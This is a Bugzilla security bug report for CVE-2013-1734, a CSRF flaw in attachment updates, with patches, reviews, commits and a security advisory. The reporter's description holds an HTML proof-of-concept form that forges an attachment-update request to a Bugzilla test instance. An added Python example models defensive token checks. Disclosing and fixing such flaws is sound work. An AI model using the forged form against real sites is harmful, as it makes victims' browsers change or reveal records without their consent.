Bug 913904 - (CVE-2013-1734) [SECURITY] CSRF when updating attachments
Status: RESOLVED FIXED
Keywords: sec-high, wsec-csrf
Product: Bugzilla
Classification: Server Software
Component: Attachments & Requests
Version: 2.16
Hardware: All, OS: All
Importance: priority --, severity major
Target Milestone: Bugzilla 4.0
Assigned To: Frédéric Buclin
QA Contact: default-qa
Mentors:
Depends on: 476603
Blocks: 912643
Reported: 2013-09-08 03:52 PDT by Mateusz Goik
Modified: 2014-07-24 16:54 PDT
CC: 4 users
mail: approval+
mail: approval4.4+
LpSolit: blocking4.4.1+
mail: approval4.2+
LpSolit: blocking4.2.7+
mail: approval4.0+
LpSolit: blocking4.0.11+
dveditz: sec-bounty+
See Also:
QA Whiteboard:
Iteration: ---
Points: ---


Attachments
patch for 4.4 and trunk, v1 (1.92 KB, patch)
2013-09-08 09:13 PDT, Frédéric Buclin
dkl: review+
patch for 4.2, v1 (1.77 KB, patch)
2013-09-08 10:01 PDT, Frédéric Buclin
dkl: review+
patch for 4.0, v1 (2.48 KB, patch)
2013-09-08 10:20 PDT, Frédéric Buclin
dkl: review+

Description Mateusz Goik 2013-09-08 03:52:15 PDT
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/attachment.cgi" method="POST">
      <input type="hidden" name="id" value="3100" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="contenttypemethod" value="manual" />
      <input type="hidden" name="delta&#95;ts" value="xxxxxx" />
      <input type="hidden" name="token" value="xxxxx" />
      <input type="hidden" name="description" value="asdasd123" />
      <input type="hidden" name="filename" value="file&#95;21994&#46;txt" />
      <input type="hidden" name="contenttypeentry" value="text&#47;plain" />
      <input type="hidden" name="comment" value="asd" />
      <input type="hidden" name="flag&#95;type&#45;4" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;4" value="" />
      <input type="hidden" name="flag&#95;type&#45;1" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;1" value="" />
      <input type="hidden" name="flag&#95;type&#45;2" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;2" value="" />
      <input type="hidden" name="flag&#95;type&#45;3" value="X" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
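The PoC above works only if the update handler accepts a request whose token field holds an arbitrary value. As an added example (not Bugzilla's own Bugzilla::Token code, and not part of the report), the following Python models the server-side gate a handler for action=update should apply: a token bound to the logged-in user, the event and an issue time under a site-wide secret, plus a delta_ts comparison that yields the invalid_timestamp outcome the backport in comment 4 refers to. Names, the secret, the lifetime and the event naming scheme are assumptions.

```python
import hmac
import hashlib
import time

# Constructed model of a stateless CSRF token for an "update attachment" request.
# Assumptions: a per-site secret kept server-side and a three-hour token lifetime.
SECRET = b"site-wide-secret-placeholder"
MAX_AGE = 3 * 3600  # seconds a token stays valid


def issue_token(user_id, event, issued_at=None):
    """Return 'issued_at-mac'; the MAC binds user, event and time to the site key."""
    issued_at = int(issued_at if issued_at is not None else time.time())
    msg = f"{user_id}|{event}|{issued_at}".encode()
    mac = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return f"{issued_at}-{mac}"


def check_token(token, user_id, event, now=None):
    """True only if the token was issued to this user for this event and is not stale."""
    now = int(now if now is not None else time.time())
    try:
        issued_at_s, _mac = token.split("-", 1)
        issued_at = int(issued_at_s)
    except (AttributeError, ValueError):
        return False  # missing, malformed or placeholder tokens such as "xxxxx"
    expected = issue_token(user_id, event, issued_at)
    return hmac.compare_digest(expected, token) and 0 <= now - issued_at <= MAX_AGE


def handle_attachment_update(form, session_user, stored_delta_ts, now=None):
    """Gate for action=update; returns the outcome instead of touching the record.

    form is the parsed POST body (HTML entities in field names already decoded),
    session_user the authenticated user id, stored_delta_ts the attachment's current
    last-modified stamp from the database.
    """
    attach_id = form.get("id", "")
    event = f"attachment_update:{attach_id}"  # assumption: token scoped per attachment
    if not check_token(form.get("token", ""), session_user, event, now):
        return "invalid_token"  # a forged cross-site POST ends here
    if form.get("delta_ts") != stored_delta_ts:
        return "invalid_timestamp"  # form is stale: record changed since it was loaded
    return "updated"
```

The token must also be fresh per page load: a value generated once and reused across requests would let a captured form replay it.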
Comment 1 Frédéric Buclin 2013-09-08 09:13:45 PDT
Created attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

This patch is similar to the one for process_bug.cgi.
Comment 2 Frédéric Buclin 2013-09-08 09:19:38 PDT
All versions are affected as bug 476603 was an incomplete fix.
Comment 3 Frédéric Buclin 2013-09-08 10:01:59 PDT
Created attachment 801248 [details] [diff] [review]
patch for 4.2, v1
Comment 4 Frédéric Buclin 2013-09-08 10:20:02 PDT
Created attachment 801251 [details] [diff] [review]
patch for 4.0, v1

I had to backport the invalid_timestamp error message which didn't exist before 4.2.
Comment 5 Daniel Veditz [:dveditz] 2013-09-08 12:09:15 PDT
Use CVE-2013-1734

Why sec-critical? This isn't compromising bugzilla in general. Beyond vandalism what's the worst you could do here? Luring a privileged user to un-hide an attachment maybe, revealing a security bug? My initial feel was moderate, but given hidden attachments I could live with sec-high.
Comment 6 David Lawrence [:dkl] 2013-09-10 13:09:41 PDT
Comment on attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

Review of attachment 801238 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Comment 7 David Lawrence [:dkl] 2013-09-10 13:34:55 PDT
Comment on attachment 801248 [details] [diff] [review]
patch for 4.2, v1

Review of attachment 801248 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Comment 8 David Lawrence [:dkl] 2013-09-10 13:49:02 PDT
Comment on attachment 801251 [details] [diff] [review]
patch for 4.0, v1

Review of attachment 801251 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl
Comment 10 Frédéric Buclin 2013-10-16 10:11:23 PDT
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified attachment.cgi
Committed revision 8778.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified attachment.cgi
Committed revision 8624.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.2/
modified attachment.cgi
Committed revision 8232.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.0/
modified attachment.cgi
modified template/en/default/global/code-error.html.tmpl
Committed revision 7760.
Comment 11 Frédéric Buclin 2013-10-17 07:58:45 PDT
Security advisory sent.
